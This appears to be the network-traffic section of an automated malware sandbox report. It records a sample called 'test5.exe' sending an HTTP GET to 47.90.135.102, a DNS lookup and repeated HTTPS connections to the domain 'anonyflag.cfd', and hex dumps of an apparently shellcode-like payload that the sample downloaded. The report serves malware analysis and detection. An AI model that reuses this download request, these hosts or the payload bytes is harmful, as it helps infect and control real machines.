                    Dec 28, 2024 11:37:34.797811031 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:34.798192978 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:34.798202991 CET44349869104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:34.799521923 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:34.799526930 CET44349869104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:35.303452969 CET44349869104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:35.303530931 CET44349869104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:35.303561926 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.303595066 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.304605007 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.304624081 CET44349869104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:35.304634094 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.304667950 CET49869443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.604901075 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.604948997 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:35.605025053 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.605540037 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:35.605556011 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:36.862246037 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:36.862333059 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:36.862679958 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:36.862688065 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:36.863765001 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:36.863769054 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:37.361051083 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:37.361109018 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:37.361180067 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.361284018 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.361306906 CET44349875104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:37.361315966 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.361352921 CET49875443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.476414919 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.476449966 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:37.476587057 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.476869106 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:37.476885080 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.038379908 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.038593054 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.039019108 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.039031982 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.040182114 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.040189028 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.539469004 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.539513111 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.539530993 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.539555073 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.539649963 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.539666891 CET44349879104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.539680004 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.539712906 CET49879443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.648263931 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.648294926 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:39.648353100 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.648566008 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:39.648580074 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:40.951555967 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:40.952392101 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:40.952807903 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:40.952816963 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:40.954142094 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:40.954148054 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:41.460263968 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:41.460319996 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:41.460321903 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.460361958 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.460505962 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.460522890 CET44349884104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:41.460542917 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.460563898 CET49884443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.585711956 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.585733891 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:41.585805893 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.586025953 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:41.586036921 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:42.799096107 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:42.799222946 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:42.813179970 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:42.813186884 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:42.814446926 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:42.814451933 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:43.286189079 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:43.286240101 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:43.286269903 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.286293030 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.286412001 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.286418915 CET44349888104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:43.286442995 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.286464930 CET49888443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.398447037 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.398493052 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:43.398602009 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.398845911 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:43.398859978 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:44.702138901 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:44.702213049 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:44.702651024 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:44.702658892 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:44.703788042 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:44.703793049 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:45.213895082 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:45.213962078 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:45.213980913 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.213999033 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.214106083 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.214123964 CET44349894104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:45.214133024 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.214163065 CET49894443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.336059093 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.336102962 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:45.336201906 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.336433887 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:45.336447954 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:46.594911098 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:46.594999075 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:46.595315933 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:46.595323086 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:46.596330881 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:46.596335888 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:47.048995018 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:47.049046040 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:47.049086094 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.049097061 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.049176931 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.049190998 CET44349900104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:47.049197912 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.049726009 CET49900443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.163912058 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.163948059 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:47.164110899 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.164330006 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:47.164343119 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.420659065 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.420727968 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.421106100 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.421113968 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.422455072 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.422461987 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.915786982 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.915843010 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.915868044 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.915894032 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.916026115 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.916052103 CET44349904104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:48.916062117 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:48.916099072 CET49904443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:49.038805008 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:49.038846016 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:49.038913012 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:49.039113045 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:49.039125919 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.342122078 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.342180014 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.344053030 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.344062090 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.345280886 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.345285892 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.851156950 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.851217031 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.851217985 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.851258039 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.851326942 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.851336956 CET44349909104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.851347923 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.851377010 CET49909443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.978169918 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.978185892 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:50.978310108 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.978590012 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:50.978600025 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.235924006 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.235992908 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.236377954 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.236392021 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.237567902 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.237574100 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.752789974 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.752842903 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:52.752861023 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.752887011 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.793277025 CET49915443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:52.793287992 CET44349915104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:53.103681087 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:53.103708029 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:53.103770971 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:53.103984118 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:53.103995085 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.407741070 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.407819986 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.408288956 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.408293009 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.409487009 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.409492016 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.911983967 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.912036896 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.912070990 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.912092924 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.912220955 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.912229061 CET44349921104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:54.912247896 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:54.912273884 CET49921443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:55.027173996 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:55.027203083 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:55.027268887 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:55.027635098 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:55.027647018 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.239305973 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.239491940 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.239940882 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.239949942 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.241240025 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.241245031 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.725769997 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.725820065 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.725852013 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.725873947 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.726073980 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.726083040 CET44349926104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.726106882 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.726129055 CET49926443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.835944891 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.835963011 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:56.836029053 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.836275101 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:56.836285114 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.143989086 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.144047022 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.144370079 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.144382954 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.145467043 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.145472050 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.651120901 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.651179075 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.651179075 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.651220083 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.651360035 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.651371002 CET44349931104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.651393890 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.651413918 CET49931443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.758229017 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.758263111 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:37:58.758327961 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.758538961 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:37:58.758553028 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.025001049 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.025064945 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.025480986 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.025491953 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.026621103 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.026626110 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.520325899 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.520389080 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.520497084 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.520622015 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.520642042 CET44349937104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.520649910 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.520684958 CET49937443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.633433104 CET49941443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.633467913 CET44349941104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:00.633533955 CET49941443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.633768082 CET49941443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:38:00.633783102 CET44349941104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:01.890069008 CET44349941104.21.34.5192.168.2.4
                    Dec 28, 2024 11:38:01.890189886 CET49941443192.168.2.4104.21.34.5
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 28, 2024 11:36:00.501036882 CET6326753192.168.2.41.1.1.1
                    Dec 28, 2024 11:36:00.903542995 CET53632671.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Dec 28, 2024 11:36:00.501036882 CET192.168.2.41.1.1.10x9de2Standard query (0)anonyflag.cfdA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 28, 2024 11:36:00.903542995 CET1.1.1.1192.168.2.40x9de2No error (0)anonyflag.cfd104.21.34.5A (IP address)IN (0x0001)false
                    Dec 28, 2024 11:36:00.903542995 CET1.1.1.1192.168.2.40x9de2No error (0)anonyflag.cfd172.67.194.170A (IP address)IN (0x0001)false
                    Dec 28, 2024 11:36:32.144622087 CET1.1.1.1192.168.2.40x50f8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Dec 28, 2024 11:36:32.144622087 CET1.1.1.1192.168.2.40x50f8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    • 47.90.135.102
                    • www.google.comhost:
                      • anonyflag.cfd
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.44973147.90.135.1024436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:35:59 UTC185OUTGET /2Vcr HTTP/1.1
                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)
                    Host: 47.90.135.102
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    2024-12-28 10:35:59 UTC208INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:35:59 GMT
                    Content-Type: application/octet-stream
                    Server: Apache
                    Cache-Control: max-age=1
                    Connection: keep-alive
                    X-Powered-By: Apache
                    Content-Length: 296007
                    2024-12-28 10:35:59 UTC8192INData Raw: fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 64 d3 d3 bc 64 57 d7 bc 29 89 92 ee 7c c1 1b 0b 34 40 f7 2b 34 40 f7 63 b9 5d 1d 9c 46 a2 55 15 99 ea d4 d6 3d 84 d5 d6 c2 57 94 6e 32 e2 36 38 5a e6 36 38 5a bc 7e b1 a3 43 ae b1 a3 43 ae b1 a3 43 ae b1 b3 42 ae b1 bd 5d 14 bf bd e9 1d 72 9c 51 1c 3e 51 70 48 56 38 03 68 26 4a 6c 0f 54 2b 01 2f 37 4a 6f 41 58 3e 4f 23 3d 1e 3d 56 53 3e 54 38 73 7a 1b 6b 53 17 74 0f 36 39 79 02 3c 1d 79 02 3c 1d 79 02 3c 99 a7 6c e3 59 18 6c 6f 99 a7 6c e3 59 18 6c 6f ff 49 a2 e3 3e f6 a2 6f dd a6 70 e3 85 19 70 6f db 06 b7 e3 1a b9 b7 6f 2b c0 78 e3 c2 7f 78 6f f3 06 b6 e3 ba b9 b6 6f
                    Data Ascii: H3]EHM1HUU1U1H19tXHddW)|4@+4@c]FU=Wn268Z68Z~CCCB]rQ>QpHV8h&JlT+/7JoAX>O#==VS>T8szkSt69y<y<y<lYlolYloI>oppoo+xxoo
                    2024-12-28 10:35:59 UTC8192INData Raw: fd 65 61 40 fe 28 c9 43 2f 69 42 8c 6b 6a 80 4d a3 67 c4 7e 73 26 4f bf b2 ee 4d fb 81 3e 0c f0 48 7f 0f 00 09 f4 dc 41 2a 3a ef 96 6b b1 28 d7 48 70 0b 01 43 b8 4a 32 90 33 8c 76 93 e2 4d be 98 69 83 fb 9b b9 42 32 82 fd cf b1 45 82 96 0e 76 4a 1d c8 37 c1 c7 09 ff c7 f4 c1 be 4c 36 00 75 5a 35 4d d9 59 e4 8c 11 54 a5 07 d8 67 7d 46 d3 ad 39 45 11 ec 1a 8a 54 ef ea cb df 2d 61 1c ec fb 20 3f 3a 3a e8 3d 09 e2 db ea 48 69 1a ab 6b ab 11 63 2a 20 d7 60 f3 61 5c ae b2 62 84 eb 3f e1 77 e0 df 27 b6 28 d4 63 3d f3 15 aa 24 c0 dd eb af 06 9c 2a 64 10 5d e2 62 23 95 69 a1 20 d8 d9 a2 f1 99 52 68 fa 52 93 a0 f7 16 90 62 b3 25 48 23 90 ec 0d 20 68 67 ce e1 a0 65 8a d2 78 24 01 10 5b e7 0a d8 1a 6c cd 9c 19 b5 0c 54 12 f4 87 9b 57 f7 5f 5a 9e ee 6c 92 df 65 ab 53
                    Data Ascii: ea@(C/iBkjMg~s&OM>HA*:k(HpCJ23vMiB2EvJ7L6uZ5MYTg}F9ET-a ?::=Hikc* `a\b?w'(c=$*d]b#i RhRb%H# hgex$[lTW_ZleS
                    2024-12-28 10:35:59 UTC8192INData Raw: 53 98 78 90 8f 11 25 a0 67 1f 3b a0 67 9a fb af e2 bb 04 50 1d f3 8f 15 f5 78 c2 c9 b9 f3 87 f1 f1 7e d2 c1 b3 f7 9e c1 a3 1f 67 ce a3 1f 8e df a1 1f 8e 54 6f 53 05 93 e4 80 4c 90 2d 09 11 a0 c5 5b 1f a0 c5 de df af 40 37 21 50 bf bc 2e 18 32 e9 1e f0 d5 f8 1e f0 3c 1f 1f f0 3c 94 d1 bc b7 53 5a 6f fe 50 93 e6 a3 60 7b a2 a9 60 7b 27 69 6f fe 98 97 90 01 d0 1a c5 31 98 91 0a d9 1c 9d 0a d9 f5 21 0b d9 f5 aa c5 95 7e 6d 4e 46 37 6e 87 cf 6a 5e 6f 02 65 5e 6f 87 a5 51 ea 87 a7 51 ea cf 2a 1c da 27 7a 10 da 27 ff d0 d5 a2 10 d1 d5 a2 f9 45 d4 a2 f9 ce 1a ee 72 09 91 3d 3b 0a 58 71 b6 47 84 f8 eb 77 6c 95 f7 77 6c 10 37 78 e9 70 c9 87 16 38 42 c2 fe 74 c9 87 c6 ff 9c 5b 84 76 c8 5b 94 3a 45 1e a4 72 ce d1 4c db dc d1 4c 32 91 d0 4c 32 1a 1a cf db 13 15 4b d3
                    Data Ascii: Sx%g;gPx~gToSL-[@7!P.2<<SZoP`{`{'io1!~mNF7nj^oe^oQQ*'z'Er=;XqGwlwl7xp8Bt[v[:ErLL2L2K
                    2024-12-28 10:35:59 UTC8192INData Raw: 5c ee 73 bd 55 ee 73 bd 1d 65 bc 55 a2 00 bd 55 29 c6 56 50 91 d1 56 50 91 99 dd 0c b5 c9 95 87 d9 ed f5 cf 52 99 d1 a7 1a 1a 15 87 5b 45 54 d9 1a 18 15 85 45 db d9 06 3c c7 d9 73 32 44 a0 53 32 31 a8 94 30 3e a8 94 30 d5 ae 53 32 c6 ae 53 32 f5 6e 90 fe 39 a2 d8 77 65 86 d0 3f ec f2 f4 2f bb ba 77 c3 9b 31 0e cb 10 43 06 86 9b 93 4a 0d 41 db c1 d4 7a 25 b4 df 3b ac cc d7 d3 29 d4 d7 d3 c2 fc 3f f9 da fc 3f b4 51 3e bc 4c ae 4b b0 0d 27 39 b8 45 ac ea f1 ce 67 01 fb 8f ee 7b f3 c6 65 a8 bb 4d ae 40 d8 54 ae 40 90 df f2 64 a0 97 79 10 84 af 31 93 40 8f 6e 50 8c 43 a2 18 05 1f 86 10 4d 96 f2 34 5d c1 ba b7 b1 81 f2 3c 68 c9 7f 70 4c e9 36 fb b4 a1 bd 09 5c bf bb 09 5c 3a 7b 7c 6d 72 f6 28 49 52 be a3 82 ba 3b a6 82 ba 73 2b ce 9e 53 a0 16 1b 93 d5 04 57 18
